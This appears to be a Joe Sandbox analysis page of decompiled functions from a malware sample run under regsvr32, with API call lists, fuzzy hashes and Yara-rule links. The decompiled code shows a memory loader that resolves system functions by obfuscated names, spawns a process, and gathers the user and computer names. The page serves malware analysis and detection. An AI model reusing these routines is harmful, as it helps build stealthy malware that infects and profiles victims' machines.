			E00F4551A(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				WCHAR* _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				WCHAR* _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				WCHAR* _t91;

				_t79 =  *0xf4d33c; // 0x5739bb8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00F4A7AA(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0xf4c1ac;
				}
				_t46 = E00F44F9F(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00F43727(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0xf4d27c; // 0x47ea5a8
						_t16 = _t75 + 0xf4eb28; // 0x530025
						wsprintfW(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00F4A7AA(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0xf4c1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00F43727(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00F46EF8(_v20);
						} else {
							_t66 =  *0xf4d27c; // 0x47ea5a8
							_t31 = _t66 + 0xf4ec48; // 0x73006d
							wsprintfW(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00F46EF8(_v12);
				}
				return _v24;
			}

0x00f45522
0x00f45528
0x00f4552f
0x00f45535
0x00f45539
0x00f4553d
0x00f45540
0x00f45547
0x00f4554a
0x00f4554c
0x00f4554c
0x00f45555
0x00f4555c
0x00f4555f
0x00f45565
0x00f4556f
0x00f45578
0x00f4557f
0x00f45598
0x00f4559f
0x00f455a2
0x00f455ab
0x00f455b4
0x00f455c5
0x00f455ce
0x00f455d2
0x00f455d6
0x00f455dd
0x00f455e0
0x00f455e2
0x00f455e2
0x00f455ec
0x00f455f5
0x00f455fc
0x00f45614
0x00f45618
0x00f45655
0x00f4561a
0x00f4561d
0x00f45625
0x00f45636
0x00f45642
0x00f4564a
0x00f4564e
0x00f4564e
0x00f45618
0x00f4565d
0x00f45662
0x00f45669

APIs

GetTickCount.KERNEL32 ref: 00F4552F
lstrlen.KERNEL32(?,80000002,00000005), ref: 00F4556F
lstrlen.KERNEL32(00000000), ref: 00F45578
lstrlen.KERNEL32(00000000), ref: 00F4557F
lstrlenW.KERNEL32(80000002), ref: 00F4558C
wsprintfW.USER32 ref: 00F455C5
lstrlen.KERNEL32(?,00000004), ref: 00F455EC
lstrlen.KERNEL32(?), ref: 00F455F5
lstrlen.KERNEL32(?), ref: 00F455FC
lstrlenW.KERNEL32(?), ref: 00F45603
wsprintfW.USER32 ref: 00F45636

Part of subcall function 00F46EF8: RtlFreeHeap.NTDLL(00000000,00000000,00F44499,00000000,?,?,00000000), ref: 00F46F04

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: lstrlen$wsprintf$CountFreeHeapTick
String ID:
API String ID: 822878831-0
Opcode ID: 9da43bd98df8672ca8e2ffcb76c0db8c236189a4f32def382942a6c839d4f08d
Instruction ID: 0d6ca00ac5fb8cb76f93f043c21ebb3b354a69856ab258400f871908c432635e
Opcode Fuzzy Hash: 9da43bd98df8672ca8e2ffcb76c0db8c236189a4f32def382942a6c839d4f08d
Instruction Fuzzy Hash: 45414776D00219FBDF11AFA4DC09A9EBFB5EF48314F054061ED04A7222E7369A15FBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F46F44, Relevance: 10.6, APIs: 7, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00F46F44(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E00F4884A(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E00F4A880( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0xf4d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0xf4d27c; // 0x47ea5a8
					_t18 = _t47 + 0xf4e3e6; // 0x73797325
					_t68 = E00F48D0B(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0xf4d27c; // 0x47ea5a8
						_t19 = _t50 + 0xf4e747; // 0x5738cef
						_t20 = _t50 + 0xf4e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E00F480DF();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E00F480DF();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xf4d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E00F46EF8(_t70);
				goto L12;
			}

0x00f46f4c
0x00f46f4c
0x00f46f5b
0x00f46f64
0x00f46f67
0x00f47074
0x00f4707b
0x00f4707b
0x00f46f76
0x00f46f7e
0x00f46f83
0x00f46f86
0x00f46f9b
0x00f46fa1
0x00f46fa2
0x00f46fa5
0x00f46fab
0x00f46fae
0x00f46fb3
0x00f46fbb
0x00f46fc7
0x00f46fcb
0x00f4705b
0x00f46fd1
0x00f46fd1
0x00f46fd6
0x00f46fdd
0x00f46ff1
0x00f46ff5
0x00f47044
0x00f46ff7
0x00f46ff8
0x00f46fff
0x00f47018
0x00f4701a
0x00f4701e
0x00f47025
0x00f4703f
0x00f47027
0x00f47030
0x00f47035
0x00f47035
0x00f47025
0x00f47053
0x00f47053
0x00f46fcb
0x00f47062
0x00f4706b
0x00f4706f
0x00000000

APIs

Part of subcall function 00F4884A: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00F46F60,?,00000001,?,?,00000000,00000000), ref: 00F4886F
Part of subcall function 00F4884A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00F48891
Part of subcall function 00F4884A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00F488A7
Part of subcall function 00F4884A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00F488BD
Part of subcall function 00F4884A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00F488D3
Part of subcall function 00F4884A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00F488E9

memset.NTDLL ref: 00F46FAE

Part of subcall function 00F48D0B: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00F459DA,63699BCE,00F47E23,73797325), ref: 00F48D1C
Part of subcall function 00F48D0B: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00F48D36

GetModuleHandleA.KERNEL32(4E52454B,05738CEF,73797325), ref: 00F46FE4
GetProcAddress.KERNEL32(00000000), ref: 00F46FEB
HeapFree.KERNEL32(00000000,00000000), ref: 00F47053

Part of subcall function 00F480DF: GetProcAddress.KERNEL32(36776F57,00F44216), ref: 00F480FA

CloseHandle.KERNEL32(00000000,00000001), ref: 00F47030
CloseHandle.KERNEL32(?), ref: 00F47035
GetLastError.KERNEL32(00000001), ref: 00F47039

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 3075724336-0
Opcode ID: f1c6cc1c7a43d8c1c0ed5a390b975ac4bb5f7f689b88f72910e6721a64e1756f
Instruction ID: 0412027e14ea94d9874bbc7902fe5a89319d3bedab31f32b3945ed29c7c5ab0e
Opcode Fuzzy Hash: f1c6cc1c7a43d8c1c0ed5a390b975ac4bb5f7f689b88f72910e6721a64e1756f
Instruction Fuzzy Hash: E6313F76C01208EFDB10AFA8DC89D9FBFB8EB05354F104465F905E7121D7749D45ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F48386, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00F48386(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xf4d27c; // 0x47ea5a8
				_t1 = _t9 + 0xf4e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E00F48FC4(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E00F43727(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E00F48B04(_t34, _t41, _a8);
						E00F46EF8(_t41);
						_t42 = E00F45A2E(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00F46EF8(_t36);
							_t36 = _t42;
						}
						_t43 = E00F4575F(_t36, _t33);
						if(_t43 != 0) {
							E00F46EF8(_t36);
							_t36 = _t43;
						}
					}
					E00F46EF8(_t28);
				}
				return _t36;
			}

0x00f48386
0x00f48389
0x00f4838a
0x00f48392
0x00f48399
0x00f483a0
0x00f483a4
0x00f483aa
0x00f483b1
0x00f483b6
0x00f483c8
0x00f483cc
0x00f483d0
0x00f483d6
0x00f483db
0x00f483eb
0x00f483ed
0x00f48404
0x00f48408
0x00f4840b
0x00f48410
0x00f48410
0x00f48419
0x00f4841d
0x00f48420
0x00f48425
0x00f48425
0x00f4841d
0x00f48428
0x00f48428
0x00f48433

APIs

Part of subcall function 00F48FC4: lstrlen.KERNEL32(00000000,00000000,00000000,745EC740,?,?,?,00F483A0,253D7325,00000000,00000000,745EC740,?,?,00F4987D,?), ref: 00F4902B
Part of subcall function 00F48FC4: sprintf.NTDLL ref: 00F4904C

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,00F4987D,?,057395B0), ref: 00F483B1
lstrlen.KERNEL32(?,?,?,00F4987D,?,057395B0), ref: 00F483B9

Part of subcall function 00F43727: RtlAllocateHeap.NTDLL(00000000,00000000,00F443D1), ref: 00F43733

strcpy.NTDLL ref: 00F483D0
lstrcat.KERNEL32(00000000,?), ref: 00F483DB

Part of subcall function 00F48B04: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00F483EA,00000000,?,?,?,00F4987D,?,057395B0), ref: 00F48B1B

Part of subcall function 00F46EF8: RtlFreeHeap.NTDLL(00000000,00000000,00F44499,00000000,?,?,00000000), ref: 00F46F04

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00F4987D,?,057395B0), ref: 00F483F8

Part of subcall function 00F45A2E: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00F48404,00000000,?,?,00F4987D,?,057395B0), ref: 00F45A38
Part of subcall function 00F45A2E: _snprintf.NTDLL ref: 00F45A96

Strings

=, xrefs: 00F483F2

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: f8d44bf96369385814fbaa442fc070184499088c61a326f540de8c46a3f0fa9a
Instruction ID: 5747649372450433935a0296c68936dc281b5199d467cdad996ded358d38dae8
Opcode Fuzzy Hash: f8d44bf96369385814fbaa442fc070184499088c61a326f540de8c46a3f0fa9a
Instruction Fuzzy Hash: 0711A37BA01529778712BBB89C85CAF3FAD9E8A7A03054025FD04E7112DE6DCD02B7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00F4884A, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F4884A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00F43727(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xf4d27c; // 0x47ea5a8
					_t1 = _t23 + 0xf4e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xf4d27c; // 0x47ea5a8
					_t2 = _t26 + 0xf4e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00F46EF8(_t54);
					} else {
						_t30 =  *0xf4d27c; // 0x47ea5a8
						_t5 = _t30 + 0xf4e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xf4d27c; // 0x47ea5a8
							_t7 = _t33 + 0xf4e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xf4d27c; // 0x47ea5a8
								_t9 = _t36 + 0xf4e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xf4d27c; // 0x47ea5a8
									_t11 = _t39 + 0xf4e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00F47B2E(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00f48859
0x00f4885d
0x00f4891f
0x00f48863
0x00f48863
0x00f48868
0x00f4887b
0x00f4887d
0x00f48882
0x00f4888a
0x00f48891
0x00f48895
0x00f48898
0x00f48917
0x00f48918
0x00f4889a
0x00f4889a
0x00f4889f
0x00f488a7
0x00f488ab
0x00f488ae
0x00000000
0x00f488b0
0x00f488b0
0x00f488b5
0x00f488bd
0x00f488c1
0x00f488c4
0x00000000
0x00f488c6
0x00f488c6
0x00f488cb
0x00f488d3
0x00f488d7
0x00f488da
0x00000000
0x00f488dc
0x00f488dc
0x00f488e1
0x00f488e9
0x00f488ed
0x00f488f0
0x00000000
0x00f488f2
0x00f488f8
0x00f488fd
0x00f48904
0x00f4890b
0x00f4890e
0x00000000
0x00f48910
0x00f48913
0x00f48913
0x00f4890e
0x00f488f0
0x00f488da
0x00f488c4
0x00f488ae
0x00f48898
0x00f4892d

APIs

Part of subcall function 00F43727: RtlAllocateHeap.NTDLL(00000000,00000000,00F443D1), ref: 00F43733

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00F46F60,?,00000001,?,?,00000000,00000000), ref: 00F4886F
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00F48891
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00F488A7
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00F488BD
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00F488D3
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00F488E9

Part of subcall function 00F47B2E: memset.NTDLL ref: 00F47BAD

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 6fc358ca84c4a7856ae87fe2a8e3f3ca33546e481871cd92a7d2f72c69d323ca
Instruction ID: f00e5829db7445554bbcea9c7e0a21d74bc932a9cf0d64b9c23bf015c1b479a0
Opcode Fuzzy Hash: 6fc358ca84c4a7856ae87fe2a8e3f3ca33546e481871cd92a7d2f72c69d323ca
Instruction Fuzzy Hash: B3219FB560160AAFEB20DF78CC44E6A7BECEB097947004465ED44C7611E774EE02EB70

Uniqueness

Uniqueness Score: -1.00%

Function 00F49525, Relevance: 7.6, APIs: 5, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F49525() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t63 = E00F43727(_v12 + _t43 + 2 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E00F46EF8(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0xf4978f
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x00f49533
0x00f49536
0x00f49539
0x00f4953f
0x00f49544
0x00f4954a
0x00f49552
0x00f49555
0x00f4955b
0x00f49560
0x00f4956d
0x00f4957a
0x00f4957e
0x00f49580
0x00f49584
0x00f49587
0x00f49597
0x00f495e9
0x00f495ea
0x00f49599
0x00f4959c
0x00f495a3
0x00f495a6
0x00f495b9
0x00000000
0x00f495bb
0x00f495be
0x00f495c3
0x00f495d1
0x00f495d4
0x00f495dc
0x00f495df
0x00000000
0x00f495e1
0x00f495e1
0x00f495e4
0x00f495e4
0x00f495df
0x00f495b9
0x00f495ef
0x00f495f0
0x00f49560
0x00f495f6

APIs

GetUserNameW.ADVAPI32(00000000,00F4978D), ref: 00F49539
GetComputerNameW.KERNEL32(00000000,00F4978D), ref: 00F49555

Part of subcall function 00F43727: RtlAllocateHeap.NTDLL(00000000,00000000,00F443D1), ref: 00F43733

GetUserNameW.ADVAPI32(00000000,00F4978D), ref: 00F4958F
GetComputerNameW.KERNEL32(00F4978D,?), ref: 00F495B1
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00F4978D,00000000,00F4978F,00000000,00000000,?,?,00F4978D), ref: 00F495D4

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: b14865bfe42ed30862c40eb7b0c50373a048ed4a15662360d38f06c681226baa
Instruction ID: 19823a024e3419ac4749fe17d4cc2e639277e6b34a380edef04f2f283fd3fbbd
Opcode Fuzzy Hash: b14865bfe42ed30862c40eb7b0c50373a048ed4a15662360d38f06c681226baa
Instruction Fuzzy Hash: DE21DB76E00108FBCB11DFE9D985CEEBBF8EE44350B64406AE901E7201EA749F44EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F47CCB, Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00F47CCB(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E00F414E8(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E00F4A953(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0xf4d130() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x00f47ccb
0x00f47cd8
0x00f47cda
0x00f47d3d
0x00000000
0x00f47d3d
0x00f47cf2
0x00f47cf9
0x00f47d05
0x00f47d0a
0x00f47d0c
0x00f47d0e
0x00f47d10
0x00f47d12
0x00f47d14
0x00f47d20
0x00f47d30
0x00000000
0x00f47d22
0x00f47d22
0x00f47d29
0x00f47d36
0x00f47d36
0x00f47d36
0x00f47d29
0x00f47d20
0x00f47d3b
0x00000000
0x00000000
0x00f47d41

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,00F4461F,?,?,00000000,00000000), ref: 00F47D05
ResetEvent.KERNEL32(?), ref: 00F47D0A
GetLastError.KERNEL32 ref: 00F47D22
GetLastError.KERNEL32(?,?,00000102,00F4461F,?,?,00000000,00000000), ref: 00F47D3D

Part of subcall function 00F414E8: lstrlen.KERNEL32(00000000,00000008,?,73B74D40,?,?,00F47CEA,?,?,?,?,00000102,00F4461F,?,?,00000000), ref: 00F414F4
Part of subcall function 00F414E8: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00F47CEA,?,?,?,?,00000102,00F4461F,?), ref: 00F41552
Part of subcall function 00F414E8: lstrcpy.KERNEL32(00000000,00000000), ref: 00F41562

SetEvent.KERNEL32(?), ref: 00F47D30

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: 0ffc37e6ed898d61aed6b3b136d7483f0cf71353bd2f6e4cff708da1f6d5384d
Instruction ID: 14154cc72b93578fd97846bb156e1ccb311ff26cfa4418d7d54a02e0217572e8
Opcode Fuzzy Hash: 0ffc37e6ed898d61aed6b3b136d7483f0cf71353bd2f6e4cff708da1f6d5384d
Instruction Fuzzy Hash: B7014B31919304AAEA317B35DC44F2BBAB8EF65770F204A25FD55D10F0D720D844BAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F4A499, Relevance: 7.5, APIs: 5, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F4A499(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t13;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xf4d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t13 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0xf4d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0xf4d258 = _t6;
					 *0xf4d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0xf4d254 = _t7;
					if(_t7 == 0) {
						 *0xf4d254 =  *0xf4d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 > 0) {
					goto L5;
				}
				_t13 = _t4 - _t4;
				goto L4;
			}

0x00f4a4a1
0x00f4a4a9
0x00f4a4ae
0x00000000
0x00f4a503
0x00f4a4b0
0x00f4a4b8
0x00f4a4c0
0x00f4a4c0
0x00f4a500
0x00000000
0x00f4a500
0x00f4a4c2
0x00f4a4c2
0x00f4a4c7
0x00f4a4d9
0x00f4a4de
0x00f4a4e4
0x00f4a4ec
0x00f4a4f1
0x00f4a4f3
0x00f4a4f3
0x00000000
0x00f4a4fa
0x00f4a4bc
0x00000000
0x00000000
0x00f4a4be
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00F494B4,?,?,00000001,?,?,?,00F480BD,?), ref: 00F4A4A1
GetVersion.KERNEL32(?,00000001,?,?,?,00F480BD,?), ref: 00F4A4B0
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00F480BD,?), ref: 00F4A4C7
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00F480BD,?), ref: 00F4A4E4
GetLastError.KERNEL32(?,00000001,?,?,?,00F480BD,?), ref: 00F4A503

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
